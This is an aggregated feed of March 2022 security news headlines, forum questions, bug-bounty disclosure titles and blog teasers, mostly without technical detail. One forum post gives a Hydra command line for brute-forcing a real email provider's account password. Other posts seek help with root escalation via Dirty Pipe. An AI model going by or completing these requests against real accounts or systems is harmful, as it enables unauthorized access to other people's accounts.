    Virtual Machines
    Are the abilities of a computer being used in a botnet bottlenecked in any way when it is being run through a VM? submitted by /u/satellitesatan [link] [comments]
  • Open

    Solution to my $20 egg hunt (Part 3)
    My latest article gave a significant hint towards solving the $20 challenge. This one will help you a few steps further… Continue reading on Medium »
  • Open

    Lateral Movement: Remote Services (Mitre:T1021)
    Introduction During Red Team assessments, after a compromise has been done, attackers tend to laterally move through the network gaining more relevant information on other The post Lateral Movement: Remote Services (Mitre:T1021) appeared first on Hacking Articles.
  • Open

    SecWiki News 2022-03-27 Review
    No news updated today. For more of the latest articles, visit SecWiki
  • Open

    Scheduled Tasks and Batteries
    Krzysztof shared another blog post recently, this one that addresses the battery use and the battery level of a system, and how it applies to an investigation. At first thought, I'm sure a lot of you are asking, "wait...what?", but think about it for a moment. Given the pandemic, a lot of folks are working remote...a LOT. There are a number of firms that are international, with offices in a lot of different countries all over the world, and a great many of those folks are working remotely. Yes, we've always had remote workers and folks working outside of office environments, but the past 2+ years have seen something of a forced explosion in remote workers. Those remote workers are using laptops. And it's likely that they're not always connected to a power supply; that is, there will be tim…
  • Open

    FreeBuf Morning Report | Nestlé says its data was leaked by itself, not stolen by Anonymous; US adds China Telecom and others to its security threat list
    On March 25 local time, the US Federal Communications Commission (FCC) added China Telecom (Americas), China Mobile (USA), Kaspersky and other companies to its list of communications equipment and service providers that pose a threat to US national security.
  • Open

    Introduction to CSRF: How can a cookie get you hacked
    submitted by /u/gooldopt [link] [comments]
  • Open

    flying spaghetti monster
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Since they'll be in the news following Taylor Hawkins' death.
    https://www.ashleecadell.com/xyzstorelibrary/Foo%20Fighters/ (yes, I am aware the parent directory has been posted recently) http://pitofdespair.randominsanity.org/music/Luna/Foo%20Fighters/ http://109.120.203.163/Music/grunge/Foo%20Fighters/ (ditto for this one) submitted by /u/ringofyre [link] [comments]
  • Open

    Real talk
    submitted by /u/DrinkMoreCodeMore [link] [comments]

  • Open

    oss-security - Re: zlib memory corruption on deflate (i.e. compress)
    submitted by /u/Gallus [link] [comments]
    PHP filter_var shenanigans
    submitted by /u/Gallus [link] [comments]
    Mining data from Cobalt Strike beacons
    submitted by /u/digicat [link] [comments]
    Using the Dirty Pipe Vulnerability to Break Out from Containers
    submitted by /u/freakwin [link] [comments]
  • Open

    Ukraine — Situation update as of 26 March
    The last 24 hours Continue reading on Medium »
  • Open

    CVE-2022-1096: Type Confusion in V8, exploit exists in the wild
    Article URL: https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html Comments URL: https://news.ycombinator.com/item?id=30814231 Points: 2 # Comments: 0
    Chrome 0day is being exploited now for CVE-2022-1096; update immediately
    Article URL: https://www.forbes.com/sites/daveywinder/2022/03/26/google-confirms-emergency-security-update-for-32-billion-chrome-users-attacks-underway/ Comments URL: https://news.ycombinator.com/item?id=30813779 Points: 257 # Comments: 141
  • Open

    [Security Advisory] Spring Cloud Function SpEL Remote Command Execution Vulnerability
    Recently, an official Spring Cloud Function test case exposed a SpEL expression injection vulnerability in Spring Cloud Function; injecting into the SpEL expression can lead to remote command execution.
  • Open

    OTP reflecting in response sensitive data exposure leads to account take over
    UPchieve disclosed a bug submitted by rupachandransangothi: https://hackerone.com/reports/1318087
    No Rate Limit on forgot password page
    UPchieve disclosed a bug submitted by pranto_0: https://hackerone.com/reports/1317494
    Password reset token leakage
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354437
    Missing Validation in editing "Your Phone Number"
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354368
    Password Reuse
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354382
    Outdated Copyright Message @ Welcome email
    UPchieve disclosed a bug submitted by ww1: https://hackerone.com/reports/1354444
    No rate Limit on Password Reset page on upchieve
    UPchieve disclosed a bug submitted by rupachandransangothi: https://hackerone.com/reports/1320138
    Clickjacking login page of https://hackers.upchieve.org/login
    UPchieve disclosed a bug submitted by sara346: https://hackerone.com/reports/1331485
    No Rate Limiting for Password Reset Email Leads to Email Flooding
    UPchieve disclosed a bug submitted by bd10ceb041a5297f881137c: https://hackerone.com/reports/1340650
  • Open

    Using the Dirty Pipe Vulnerability to Break Out from Containers
    Article URL: https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/ Comments URL: https://news.ycombinator.com/item?id=30813614 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-03-26 Review
    Using Open-Source Intelligence to Discover and Explain Malicious Activity by ourren. For more of the latest articles, visit SecWiki
  • Open

    Vulnerability Intelligence | Spring Cloud Function SpEL Expression Injection Vulnerability Notice
    Recently, an official Spring Cloud Function test release disclosed a SpEL expression injection vulnerability in Spring Cloud Function. By exploiting it, malicious actors can carry out remote injection attacks through specially crafted SpEL expressions. Given that the affected Spring Cloud Function components have a limited scope of use, and that we were unable to trigger the vulnerability under the default configuration, the actual impact is not high. FreeBuf rates this vulnerability as "Medium". Vulnerability description: S
  • Open

    Stuxnet worm | The world's first digital weapon
    submitted by /u/OkFaithlessness2414 [link] [comments]
  • Open

    pictures from a monster raving loony candidate
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    ToolsRus CTF — Writeup
    In this CTF we have multiple tools we’ll use to enumerate, exploit to gain access and then catch a shell to capture the flag. Continue reading on Medium »
    Cybersecurity Adventure
    This blog will be a way for me to share with you my journey through cybersecurity. I will do this by creating walkthroughs ranging from… Continue reading on Medium »
  • Open

    Reverse Engineering Fortinet Fortigate Devices
    I want to view the traffic between a FortiGate device and the Fortinet APIs (where Fortinet gets updates, threat intelligence, etc.). I've got a VM of FortiGate and I've got it proxying traffic via Burp Suite. I'm fairly sure that the FortiGate device has SSL pinning enabled, because despite adding my CA cert, I still can't see the traffic. Questions: how would I gain root on this device? Secondly, how would I remove the SSL pinning or replace the cert? submitted by /u/danchuckaway27 [link] [comments]
    Recommendation
    Currently my supervisor has asked me to check Acunetix and Qualys (I haven't used these before). Any recommendation on why I would recommend Acunetix over Qualys, and vice versa? Thank you. I prefer Acunetix because the company is using PHP, and for the interface of Acunetix and its ease of use. submitted by /u/pldc_bulok [link] [comments]
    Malicious email tools in O365
    Can someone point me to the best education/information on how to properly use all tools available for security around O365 email? submitted by /u/rogueit [link] [comments]
    Outlook gives "site security cert invalid" message, further viewing shows weirdness?
    Hi all, I use Office365, and have Outlook installed on my W10 machine. Have operated this way for years. I have some basic infosec knowledge, at least to the point where I know what to avoid and what steps to take to keep myself somewhat secure. From time to time a message pops up in Outlook telling me that a site security cert has a problem. Normally I just ignore it, but today I decided to look into it further. When I view the certificate details, the thing that popped out to me was a Huawei email address. Screenshots. Now I think I'm just being curious/paranoid, but figured I'd ask because at the least I'd get a better understanding of what's happening. Am I right in thinking that this relates to a particular email message containing content that's hosted somewhere, and that's what Outlook is hesitant to access? Or does this relate to something else? Rather than this being the CCP having broken into my house and installed a custom CPU containing embedded backdoor access into my decade-old gaming rig, I would think that this probably relates more to major back-end backbone infrastructure stuff, which Huawei does a lot of, so is probably more along those lines? Any info appreciated. p.s. don't need to be told to use different email/PC/internet/security/OS, but I understand it's a natural reflex many of you can't control :D submitted by /u/JForce1 [link] [comments]

  • Open

    Enhance Network security skills advice ?
    Hello, I am currently a rising senior going to graduate with a Management of Information Systems B.S., and I am very interested in cybersecurity. I've been studying for S+ & N+ and that has helped my cyber knowledge tremendously. I was wondering how I can enhance my skills? I want to join a red team for a big company. Any tips on how to perform penetration tests? How to perform network scans? And how to look for vulnerabilities? What software do I need? I've been trying to use Kali Linux but it's so hard to download on Mac. Any tips? I know most of the basic cybersecurity knowledge, I just want to apply it and practice! submitted by /u/AffectionateDot4877 [link] [comments]
    Tests to run on a Raspberry Pi LoRa protocol
    Hi, I have a very general inspiration problem. I'm currently doing my MSc thesis. We are implementing a protocol (kind of like the Signal one) for LoRa networks. We have the protocol implemented in Rust, and the plan was to put it onto a constrained device that we had found and then measure the power consumption of the protocol. We have run into a roadblock though: the devices we had in mind are incompatible with the LoRa resource we have at hand. So now we're putting the project on a Raspberry Pi instead. This kind of ruins the whole idea of reading the power usage of the device, since the Raspberry Pi consumes so much power that power readings won't really make much sense. So what I want to ask the creative minds of asknetsec is if anyone can think of any measurements, or interesting academic experiments, that one could do with the Raspberry Pi? Checking security properties in some way or something? Or is there a cool way of measuring power on a Raspberry Pi that can abstract away some of the operations that the Pi does usually? submitted by /u/GarseBo [link] [comments]
    OWASP ZAP with google authentication?
    Can I run OWASP ZAP on a web app that uses Google authentication? Or provide it a cookie from a browser that is already authenticated to said app? I can't find anything about Google authentication in the documentation. submitted by /u/Individual-Quarter47 [link] [comments]
    Looking for insight/experience on PAM solutions from an offensive perspective
    Hello, as the title says, I'm trying to gather some insight into PAMs (such as Thycotic and CyberArk) from the perspective of red teamers/pentesters. Google hasn't turned up much in the way of blogs or writeups. Our company is in talks with a vendor to implement this type of software, and I'm not seeing eye-to-eye with the reps. They claim it will mitigate most common AD attacks against privileged accounts, but I'm struggling to see how exactly it will mitigate attacks such as PtH and forging tickets. Understandably, it will make it harder to capture a hash and cut down on persistence if the passwords are regularly rotated, but it certainly doesn't make it impossible (or even improbable) to execute these traditional attacks. So, if anyone has any first-hand experience or a link to a good blog/writeup, I would be very appreciative. In addition, with consideration to what I've asked, I also welcome your opinion on 'is it worth it'. Thank you in advance. submitted by /u/GrandWheel50 [link] [comments]
    education pathing advice
    I just completed my bachelor's with a concentration in cybersecurity. My current company reorganized; I got rehired, but am not where I'd like to be. While exploring entry-level infosec jobs during the reorg (internal and external), most roles wanted either more experience or more certs. (I have IT support, analyst, and leadership experience; no SOC, security or compliance analyst roles.) I currently only have CompTIA A+, Net+, Sec+. My current employer offers tuition assistance of 8k/year with no degree cap. Does it make sense to get a master's from WGU with two EC-Council certifications (approximately 2 years on tuition assistance, and potentially finishing early with scholarship opportunities), OR a bachelor's of applied cybersecurity from SANS Institute with 9 GIAC certs and an internship at the Internet Storm Center (approximately 4 years with tuition assistance/no loans)? Loans/extra financial responsibility need to be avoided, as I'm a single parent about to need to help my child with college in 2 years, which is a big determining factor in speed of completion due to funding. submitted by /u/GestahlianSociety [link] [comments]
    Submitted a bug/vulnerability/exploit to Apple but they wont Pay me ?
    More like an exploit/vulnerability that gains full disk access to the system if you have physical access to the machine... This is working on the latest Monterey OS. All I got from Apple was a thank-you for working with our team and no reward, after submitting a lot of information, files, and videos etc. demonstrating how it works. Anyone else had this happen? I feel like I got robbed. And the worst thing about it is, I could've sold the exploit to another bug bounty website... the website states $100,000-$200,000 for this type of exploit: https://developer.apple.com/security-bounty/ submitted by /u/0sculum3stm0rtis [link] [comments]
  • Open

    How to detect IMSI catchers
    submitted by /u/knoy [link] [comments]
    Detect malicious activity in Okta logs with Falco and Sysdig okta-analyzer
    submitted by /u/MiguelHzBz [link] [comments]
    RTLO Injection URI Spoofing CVE-2020-20093; 20094; 20095; 20096... chilling in plain sight for 3 years 👀 — iMessage, WhatsApp, Instagram, and Facebook Messenger. Telegram patched earlier & Signal fixing today!
    submitted by /u/docker-osx [link] [comments]
    Finding bugs to trigger Unauthenticated Command Injection in a NETGEAR router (PSV-2022–0044)
    submitted by /u/stypr [link] [comments]
    Red Canary's 2022 Threat Detection Report
    submitted by /u/tvjust [link] [comments]
    Splunk Patches Indexer Vulnerability Discovered By Team82
    submitted by /u/n0llbyte [link] [comments]
    What to look for when reviewing a company's infrastructure
    submitted by /u/okram87 [link] [comments]
    Video - SSH Phishing attack on FIDO protected ssh keys
    submitted by /u/ssh-mitm [link] [comments]
    Heap Overflow in OpenBSD's slaacd via Router Advertisement
    submitted by /u/Gallus [link] [comments]
  • Open

    Found a useful Tools and Programs list for Digital Forensics
    submitted by /u/Khaotic_Kernel [link] [comments]
  • Open

    The Mystery Admin User
    One of our clients recently submitted a malware removal request with a curious problem: A mystery admin user kept getting re-created on their website. Try as they might, nothing they did would get rid of this user; it just kept coming back. A suspicious “user” that just won’t go away… It was suspiciously generic, named simply “user” and had no name, content, or email attached to it. Continue reading The Mystery Admin User at Sucuri Blog.
  • Open

    Hacking Wordpress, DC 6 from Vulnhub
    https://youtu.be/aJ52gTHzzKQ submitted by /u/luzunov [link] [comments]
  • Open

    Dual North Korean hacking efforts found attacking Google Chrome vulnerability
    Article URL: https://www.cyberscoop.com/north-korea-hackers-google-dream-job/ Comments URL: https://news.ycombinator.com/item?id=30805937 Points: 2 # Comments: 0
    Vulnerability in Honda's Remote Keyless System
    Article URL: https://github.com/nonamecoder/CVE-2022-27254 Comments URL: https://news.ycombinator.com/item?id=30804702 Points: 428 # Comments: 189
  • Open

    SecWiki News 2022-03-25 Review
    Global Advanced Persistent Threat (APT) 2021 Annual Report by ourren; The Lapsus$ Group's Techniques in Attacking Microsoft and Some Lessons by ourren; Predicting Functional Vulnerability Exploitation by ourren. For more of the latest articles, visit SecWiki
  • Open

    Misconfigured Rate Limit at app.sign.plus/forgot_password
    Alohi disclosed a bug submitted by shamim_12__: https://hackerone.com/reports/1472394
    F5 BIG-IP TMUI RCE - CVE-2020-5902 (.packet8.net)
    8x8 disclosed a bug submitted by remonsec: https://hackerone.com/reports/1519841
    Business Logic Flaw in the subscription of the app
    Dragon disclosed a bug submitted by engr-naseem1: https://hackerone.com/reports/1505189 - Bounty: $250
    Broken link hijacking in https://kubernetes-csi.github.io/docs/drivers.html?highlight=chubaofs#production-drivers
    Kubernetes disclosed a bug submitted by 0xlegendkiller: https://hackerone.com/reports/1466889 - Bounty: $100
  • Open

    About
    Hi! I'm hahwul. I like doing various things about hacking, security and all the techniques of computer science. "hahwul" is a new word made by remixing my name, and it means me. The pronunciation is a little vague: say 'ha-hul', but you can just call me 'howl'. If you have any other questions please feel free to contact me (@hahwul). package main type Me struct { Job string Pronouns string SpecialMove string MainWeapon string Language []string } func main() { me := &Me{ Job: "🗡 Security engineer and Red team that aims for a purple team.
    Security Crawl Maze and ZAP
    Was it around the beginning of this month? Simon, the main developer of ZAP, posted this tweet: Anyone able to recommend any open source tools that are good at crawling modern web apps? Out of the box rather than toolkits. Apart from @zaproxy I'm looking for comparisons 😁 As far as I know, I felt that the Spider/Crawler of ZAP and Burp Suite were the best, so I mentioned ZAP and Burp Suite. At that moment I had a feeling that ZAP was going to improve its spidering. Some time later, ZAP, through the StackHawk ZAP Fund, ran a bug bounty for old bugs (it's a bit different from the bug bounty we know of.
  • Open

    CTF Writeup: VishwaCTF 2022
    This is my writeup for the VishwaCTF 2022, which includes OSINT, Misc, Forensics, Cryptography challenges. Continue reading on Medium »
    L’espion Walkthrough — Cyberdefenders
    Challenge Link: L’espion Continue reading on Medium »
    Ukraine — Situation update as of 25 March
    The last 24 hours Continue reading on Medium »
    OSINT TOOLS
    WHAT TOOLS DO YOU NEED TO KNOW? Continue reading on Medium »
  • Open

    Plenty of learning material for technicians
    https://edu.anarcho-copy.org/ submitted by /u/Appropriate-You-6065 [link] [comments]
  • Open

    How Token Misconfiguration can lead to takeover account
    this has been moved to Continue reading on Medium »
    Solution to my $20 egg hunt (Part 2)
    This is part 2 of my tutorial on how to solve my $20 egg hunt. This post should help you towards the end of this challenge… Continue reading on Medium »
  • Open

    hackmyvm Series 1: hotle
    This article is for technical discussion and learning only; do not use it for illegal purposes. Any illegal use has nothing to do with the author!
    The Cybersecurity Review Measures, Dramatized Edition (Part 2)
    A vivid dramatized edition of the Cybersecurity Review Measures; come and learn.
    The Cybersecurity Review Measures, Dramatized Edition (Part 1)
    A dramatized edition of the Cybersecurity Review Measures; come and learn.
    US charges 4 Russian government employees with hacking activity
    The US government has charged four Russian government employees with participating in cyberattacks against hundreds of companies and organizations in the global energy sector.
    Ceye, for detecting out-of-band (OOB) traffic
    Built on the rich fingerprint library of the FOFA platform, Goby can quickly and efficiently perform asset discovery on a target network environment.
    FBI: Cybercrime caused losses of up to US$6.9 billion in 2021
    Compared with 2020, both the number of reports and the amount of losses in 2021 rose markedly; losses grew by more than 2 billion dollars, close to one half, which is astonishing.
    FreeBuf Weekly | Lapsus$ extortion group breaches Microsoft source code repository; hackers use a new rootkit to attack bank ATMs
    On the evening of March 21, Lapsus$ published 37GB of source code stolen from Microsoft's Azure DevOps server, covering various internal Microsoft projects including Bing, Cortana and Bing Maps.
    FreeBuf Enterprise Group Discussion | Public cloud, private cloud or hybrid cloud? A conversation on enterprise cloud security
    In recent years, moving to the cloud seems to have become an inevitable trend for enterprises, but how to migrate scientifically and efficiently, and how to choose cloud products, have become unavoidable questions in enterprise digital transformation.
    A Brief Analysis of Java RMI Exploitation Techniques
    RMI is a remote method invocation framework bundled with the JDK, used to implement method calls across JVMs.
    Anonymous claims to have breached the Russian central bank
    The internationally known hacker group Anonymous recently claimed to have broken into the Central Bank of Russia.
    A rundown of the Lapsus$ hacking group's recent spree
    "Each new wave pushes the last; each generation outdoes the one before": the brazen hacker group Lapsus$.
    London police arrest 7 suspected Lapsus$ members; 16-year-old suspected of being one of the leaders
    The seven suspects range in age from 16 to 21; police have since released them, but the investigation continues.
  • Open

    In-Depth Analysis of Reflection Attacks Based on the OpenAFS File System
    Author: Baidu Security Lab. Original link: https://mp.weixin.qq.com/s/CIAdpOoxQ-ARwitVmTxX7Q. 0x00 Overview: In March 2022, the Baidu Zhiyundun team captured, for the first time, a reflection amplification attack abusing the OpenAFS service. According to available information, this reflection attack method had never been seen anywhere before; the Zhiyundun system identified the attack within 2 seconds and isolated and scrubbed the traffic in real time, protecting users from DDoS harm. After in-depth analysis, we confirmed that this attack was...
  • Open

    Need help with hydra syntax
    Hi, I was wondering if someone could give me some help with something in THC Hydra. I will start by saying I am new to this, so if the answer is easy and obvious, sorry. I want to make sure that the syntax I am using here is correct based off the current version (9.3). I am trying to crack the password for this mail.com email address (this is my friend's account; we are practicing together). This is the syntax I am using (this is not the real account obviously): hydra -1 suchandsuch@mail.com -x 8:12:aA1 smpts://smtp.mail.com I want the password to include upper case and lowercase as well as numbers. I also would like for symbols to be included and I don't know the character for that. Lastly, I am not sure if the last part is correct? Thank you in advance for any help you can provide; I greatly appreciate it. submitted by /u/jigentsu [link] [comments]
  • Open

    Windows Event Log Evasion Review
    Before I kick this blog post off, I'd like to thank Lina L for her excellent work in developing and sharing her work, both on Twitter, as well as in a blog post. Both are thoughtful, cogent, and articulate. In her blog post, Lina references detection techniques, something that is extremely important for all analysts to understand. What Lina is alluding to is the need for analysts to truly understand their tools, and how they work. Back around 2007-ish, the team I was on had several members (myself included) certified to work PCI forensic investigations. Our primary tool at the time for scanning acquired images and data for credit card numbers (CCNs) was EnCase (at the time, a Guidance Software product)...I believe version 6.19 or thereabouts. We had a case where JCB and Discover cards were…

  • Open

    Tetanus - Mythic C2 Agent written in Rust
    submitted by /u/hackerbby [link] [comments]
    Countering threats from North Korea
    submitted by /u/dmchell [link] [comments]
    The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en
    submitted by /u/dmchell [link] [comments]
    Log4j CVE-2021-44228
    Hi all! I'm making an assignment for my university which consists of executing a pentest on a Docker container. By scanning with Nessus I found a Log4j vulnerability and I'm trying to get a PoC of it. I searched on the web but I didn't find any interesting info about how to do that. Does anyone have some ideas? According to Nessus, it seems to be related to the LDAP service (the vulnerability was found on TCP port 80). https://preview.redd.it/m4vk6psk6bp81.png?width=1345&format=png&auto=webp&s=6d0e5541c4aa627f4c610943d185342a7c269909 submitted by /u/_1NiCk1_ [link] [comments]
  • Open

    21 Best Kali Linux Tools for Hacking and Penetration Testing
    There are several types of tools that come pre-installed. If you do not find a tool installed, simply download it and set it up. It's… Continue reading on Medium »
    You need to know this ZAP/Burp trick if you do mobile testing
    Did you know you can use multiple proxies in burp and zap? Continue reading on System Weakness »
    You need to know this ZAP/Burp trick if you do mobile testing
    Did you know you can use multiple proxies in burp and zap? Continue reading on Medium »
    FRUSTRATED FROM BUG HUNTING WHEN YOU CAN’T FIND BUG
    HELLO READERS , Continue reading on Medium »
    One Month Bug Bounty Journey Update
    My goal with this is to explain some of my thoughts and how they changed as I progressed and how I modified my path along the way. For we… Continue reading on Medium »
    Instagram and Facebook Account Takeover if another user account is logged into your system/mobile
    Hi, I'm Praveen Kumar, let's start with how we can achieve complete takeover of and access to other Facebook and Instagram accounts if they are… Continue reading on Medium »
    Hacking Security Ebooks
    👉Comment on any broken links or requests for books. 👉Follow me on Twitter:https://twitter.com/root_babu 👉Follow me on… Continue reading on Medium »
    A curated list of various bug bounty tools
    Contents Continue reading on Medium »
    Information Gathering: Concept, Techniques and Tools explained
    Information Gathering means gathering different kinds of information about the target. It is basically, the first step or the beginning… Continue reading on Medium »
    Facebook bug bounty: Part- 1 Expectation vs Reality
    I have already written some reports on bugreader you can check here. Continue reading on Medium »
    What “if” I can get more reward?
    An incomplete if condition that leads to a catastrophic loss. Continue reading on Medium »

    Impersonation of tiktok account via Broken Link in TikTok Newsroom
    TikTok disclosed a bug submitted by bushidobrown200: https://hackerone.com/reports/1504294
    Time-of-check to time-of-use vulnerability in the std::fs::remove_dir_all() function of the Rust standard library
    Internet Bug Bounty disclosed a bug submitted by hkratz: https://hackerone.com/reports/1520931 - Bounty: $4000
    Improper Authentication via previous backup code login
    Basecamp disclosed a bug submitted by fuzzsqlb0f: https://hackerone.com/reports/1485788 - Bounty: $250

    Does disabling an account remove the Account Authorization?
    A small team at work is going through NIST 800-53 Rev5 to map our work policies and procedures to NIST frameworks, identifying gaps and proposing changes. We did this with NIST CSF last year and found it useful, so we are now continuing on with 800-53. Currently, a coworker and I have a debate that I am going to lose, but would like to see if anyone smarter than me can provide a solid rebuttal.

    Here is the setup. We are determining if policy related to disabling or deleting an account maps to this control: AC-2d.3. Access authorizations (i.e., privileges) and [Assignment: organization-defined attributes (as required)] for each account;

    My argument is: Disabling an account disables the ability to authenticate to the account, but does not remove the previous authorization to the account. If someone subsequently enabled the account, the authorization would already exist, as its authorization did not change. Thus, policy around disabling an account is not considered for AC-2d.3. Deleting an account removes the account from the identity directory, which would also remove it from any authorizations associated with that account (assuming, of course, you have properly authorized the account using a tool that would also remove that authorization). Creating a new account with the same authorization would require authorizing the new account with the same authorization as the deleted account. Thus, policy around deleting an account is considered for AC-2d.3.

    My coworker says they have an argument for me that has worked with auditors. I have a week to find a rebuttal that will hold water. submitted by /u/dmburl
    MacOS Trustd and China
    Apologies in advance - this is a double post (I originally posted it in the macOS community and someone suggested I post it here as well). I have Little Snitch (LS) running on my M1 MacBook Pro. Periodically, I will check the LS Network Monitor to see where traffic is going. Today, I noticed that there were 4 connections to mainland China and all were trustd\apple.com\ocsp2.apple.com. What is interesting to me is: I also have a separate (with the gear symbol) trustd\apple.com\ocsp2.apple.com connecting to locations in the US. I've never had trustd connecting to China. Anyone else, not based in China, have Little Snitch and can check to see if they have connections going to China with trustd?

    Little Snitch shows one of the China trustd IP addresses as: 110.188.2.1. The organisation owning this IP address is China Telecom Sichuan. The other 3 are: 111.43.160.66, 112.92.99.203, 120.240.74.66. The US based trustd IP addresses are mostly 17.253.127.xxx, which are Apple owned (I think).

    FYI - per Little Snitch: "Trust Daemon" is a macOS system process that is responsible for evaluating the validity of digital certificates that are used for encryption and security features. "trustd" connects to the servers of several certificate authorities to evaluate the validity of digital certificates. If you deny these connections, apps on your computer may not be able to connect to servers on the Internet. submitted by /u/idid2reddit
    Open Source API Security Tools
    Looking to add protections for web application APIs. Are there any good open source API security tools? submitted by /u/Calm_Scene
    Trying to bypass this sudoers file thing, need help!
    https://ibb.co/1byT2pm I just learned about the Dirty Pipe vulnerability but I am unable to get root access. Although this machine is vulnerable to Dirty Pipe, the guy who set up this machine has removed the user from the sudoers file; even more, I'm not able to edit the sudoers file, idk why. Does anyone have any idea about how to bypass this filter and get root access by privilege escalation? Pls help submitted by /u/The_Intellectualist
    Meta-Sploit ILITIES
    I am scanning a website with nmap and I get this type of output: https://vulners.com/metasploit/MSF:ILITIES/blahblah/blahblah but there is no ILITIES module? I tried googling it and I got nothing. Does anyone have any tips/solutions? submitted by /u/NSA-cat

    A quick reminder: Don't stress on both threat and vulnerability
    Article URL: https://techkettle.blogspot.com/2022/03/a-quick-reminder-dont-stress-on-both.html Comments URL: https://news.ycombinator.com/item?id=30795327 Points: 1 # Comments: 0

    Threat Brief: Lapsus$ Group
    The Lapsus$ Group grew from launching a handful of destructive attacks to stealing and publishing source code of top-tier technology companies. The post Threat Brief: Lapsus$ Group appeared first on Unit42.
    2022 Unit 42 Ransomware Threat Report Highlights: Ransomware Remains a Headliner
    2022 Unit 42 Ransomware Threat Report highlights include average ransom demands and payments and new developments in double extortion and RaaS. The post 2022 Unit 42 Ransomware Threat Report Highlights: Ransomware Remains a Headliner appeared first on Unit42.

    Another vulnerability in the LPC55S69 ROM
    submitted by /u/mckirk_
    Remote Code Execution on Western Digital PR4100 NAS (CVE-2022-23121)
    submitted by /u/digicat
    CVE-2022-24415, CVE-2022-24416, CVE-2022-24419, CVE-2022-24420, CVE-2022-24421 : New Dell BIOS Bugs Affect Millions of Inspiron, Vostro, XPS, Alienware Systems
    submitted by /u/Late_Ice_9288

    Lateral Movement: WebClient Workstation Takeover
    Introduction The article is based on @tifkin_’s idea that a workstation takeover, also known as lateral movement, is possible by abusing WebDAV shares. In Certified The post Lateral Movement: WebClient Workstation Takeover appeared first on Hacking Articles.

    SecWiki News 2022-03-24 Review
    OpenCTI Getting Started Notes (1): Setting Up the Framework and Importing Data by ourren; LSTM-Based Binary Code Similarity Detection by ourren; Vulnerability Intelligence: Why, What and How by ourren; A Brief Discussion of Fuzzing Fundamentals: Guidance Mechanisms by ourren. For more recent articles, visit SecWiki.

    is it possible to scan a smart assistant such as an alexa or google home for evidence
    Hi, I'm writing a paper on forensic acquisition of smart assistants and I was wondering: is there any way to scan and view files from an Alexa? submitted by /u/bradfordranger5

    Medium > LinkedIn
    Imma post interesting things about the Ten Million Dollar Home Page (xmdhp.com) here. Follow me to the top. I ❤️ Medium. Continue reading on Medium »

    April 8 | Registration opens for the FreeBuf cloud security open course
    Registration is open for the FreeBuf cloud security open course on April 8; take a look at the courses on offer!
    FBI warns U.S. energy companies to watch for cyberattacks from Russia
    The FBI recently warned U.S. energy companies that Russia-linked attackers may be preparing cyberattacks against them.
    Zero-trust threat isolation brings enterprises closer to security compliance requirements
    Since the 18th Party Congress, the Party Central Committee has attached great importance to cybersecurity and informatization work.
    FreeBuf Morning Brief | EU warns that satellite communication networks may be under threat; Ukrainian companies hit by DoubleZero attacks
    Security research firm ASEC found a new piece of malware spreading widely online; it masquerades as a Windows activation tool but is actually the BitRAT remote access trojan.
    More than 200,000 MikroTik routers worldwide are under the control of botnet malware
    Experts recently said that the botnet-controlled MikroTik routers represent one of the largest cybercrime operations they have seen in recent years.
    The Cyberspace Administration of China and 11 other departments jointly issue the list of IPv6 technology innovation and integrated application pilots
    The notice states that, following recommendation by local and relevant departments, expert review and re-examination, and online public notice, 22 comprehensive pilot cities and 96 pilot projects have been selected.
    Thieves robbing thieves: hackers steal information from their peers by pushing fake malware
    Analysts at two security firms discovered hackers targeting other hackers: clipboard stealers disguised as cracked RATs and malware builders are used to attack other hackers.
    Russia says Google News publishes false war information and restricts it within the country
    Russia has blocked access from within the country to Alphabet's news aggregation service Google News.

    U.S Army Launches the Cyber Military Intelligence Group (CMIG)
    The U.S. Army has recently announced the development and public launch of the Cyber Military Intelligence Group (CMIG), which aims to use both proprietary and public sources to build situational awareness in the world of cyber warfare and of malicious and fraudulent adversaries. An excerpt: "The CMIG’s function is to direct, synchronize and coordinate intelligence support to
    Israel Blocks Ukraine From Purchasing Pegasus Spyware
    According to the Guardian, Israel blocked Ukraine from purchasing the Pegasus spyware from the infamous NSO Group, vendor of lawful-surveillance hacking tools. Not surprisingly, this is a somewhat exaggerated and self-serving statement that actually does more PR harm than good, despite the fact that the article mentions Israel's "2007 Defense Export Control Act", which prevents the country
    Assessing the U.S Intelligence Community's Annual Threat Report for 2022
    In the most recently released "U.S. Intelligence Community's Annual Threat Report for 2022", the U.S. Intelligence Community states that China remains the U.S.'s most sophisticated and relevant cyber adversary, possessing the sophistication necessary to target the country both through cyber espionage and through attacks against U.S. critical infrastructure. An excerpt: "We assess that China presents the

    Learning V8 Exploitation from Scratch: CVE-2021-21225 (Part 9)
    Author: Hcamael@Knownsec 404 Team. Date: March 16, 2022. Related reading: Learning V8 Exploitation from Scratch: Environment Setup (Part 1); V8 Generic Exploit Chain (Part 2); starctf 2019 OOB (Part 3); CVE-2020-6507 (Part 4); CVE-2021-30632 (...
    Attacking Kubernetes via the gateway-api
    Author: lazydog. Original: http://noahblog.360.cn/abuse-gateway-api-attack-kubernetes/ Preface: A few days ago I noticed an official Istio advisory about a privilege escalation vulnerability (CVE-2022-21701) that can be exploited with only CREATE permission on the Kubernetes Gateway API. Reading the advisory and diffing the patch did not reveal much, so following my own intuition...
    Clipper Malware Disguised as the AvD Crypto Stealer
    Translator: Knownsec 404 Team translation group. Original: https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/ Information-stealing malware is on the rise. Cyble Research Labs recently found a new piece of malware called "AvD crypto stealer" on a cybercrime forum. On further investigation, however, we observed that it is not a crypto stealer at all. It is actually a disguised, well-known...
    RealWorld CTF: Analysis of the qiling Framework
    Author: 时钟@RainSec. This article was contributed by the author; Seebug Paper welcomes your submissions, and accepted articles receive a gift! Submission email: paper@seebug.org. qiling: the challenge provided just a usage example for qiling, nearly identical to the one in the official documentation, so the problem had to be in the library itself. #!/usr/bin/env python3 import os import sys import base64 import ...
    Thoughts on Container Process Switching
